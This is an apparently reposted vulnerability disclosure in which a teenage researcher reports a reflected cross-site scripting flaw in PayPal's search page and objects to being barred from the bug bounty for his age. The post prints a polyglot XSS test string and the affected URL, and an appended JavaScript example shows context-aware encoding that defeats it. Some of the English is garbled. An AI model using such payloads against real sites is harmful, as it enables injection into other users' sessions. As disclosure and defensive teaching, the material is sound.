Hello all!
I'm Robert Kugler, a 17-year-old German student who's interested in
securing computer systems.
I would like to be cross-site
Scripting vulnerability!
PayPal Inc. is running a bug bounty program for professional security
researchers.
www.paypal.com/us/webapps/mpp/security/reporting-security-issues
XSS vulnerabilities are in scope. I have tried
to PayPal Site Security.
The vulnerability is located in the search function and can be triggered
with the following JavaScript code:
'; alert (String.fromCharCode (88,83,83)) //'; alert (String.fromCharCode (88,83,83)) // ";
alert (String.fromCharCode (88,83,83)) // "; alert (String.fromCharCode (88,83,83)) // -
</ SCRIPT> "> '> <SCRIPT> alert (String.fromCharCode (88,83,83)) </ SCRIPT>
www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
Screenshot: picturepush.com/public/13144090
Unfortunately, PayPal disqualified me from payment
because of being 17 years old ...
PayPal Site Security:
"To be eligible for the Bug Bounty Program, you *must not*:
... Be less than 18 years of age. If PayPal discovers that a researcher does
PayPal will remove that researcher from
the Bug Bounty Program and disqualify them from receiving any bounty
payments."
I don’t want to pay
you are not interested in security
researchers ...
Best regards,
Robert Kugler
Source: https://habr.com/ru/post/181013/
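
The string in the post chains single-quote, double-quote and tag breakouts, so it acts wherever a search term is reflected without encoding for that output context. The following is an added example, not part of the original post and not PayPal's code: it reflects the string, as printed above, into three contexts of a hypothetical results page, with and without per-context encoding (`renderSearchPage`, `encodeHtml`, `encodeJsString` and `countScriptTags` are assumed names).

```javascript
// Added example. Function names are hypothetical; the post shows no server code.
// The string from the post, as printed on this page (spacing included).
const LOCATOR =
  `'; alert (String.fromCharCode (88,83,83)) //'; alert (String.fromCharCode (88,83,83)) // "; ` +
  `alert (String.fromCharCode (88,83,83)) // "; alert (String.fromCharCode (88,83,83)) // - ` +
  `</ SCRIPT> "> '> <SCRIPT> alert (String.fromCharCode (88,83,83)) </ SCRIPT>`;

// For HTML element content and quoted attribute values.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// For a quoted string literal inside an inline <script> block: everything
// outside a small allow-list becomes \uXXXX, so no quote, slash or '<' survives.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ,._]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hypothetical results page that reflects the search term in three contexts.
// safe=false models a page that echoes the term with no encoding at all.
function renderSearchPage(term, safe = true) {
  const html = safe ? encodeHtml : (s) => s;
  const js = safe ? encodeJsString : (s) => s;
  return [
    `<p>Results for ${html(term)}</p>`,
    `<input name="q" value="${html(term)}">`,
    `<script>var lastQuery = '${js(term)}';</script>`,
  ].join('\n');
}

// Number of <script> start tags in the markup; the template itself has exactly one.
function countScriptTags(markup) {
  return (markup.match(/<script\b/gi) || []).length;
}

console.log('unencoded:', countScriptTags(renderSearchPage(LOCATOR, false)));
console.log('encoded:  ', countScriptTags(renderSearchPage(LOCATOR, true)));
```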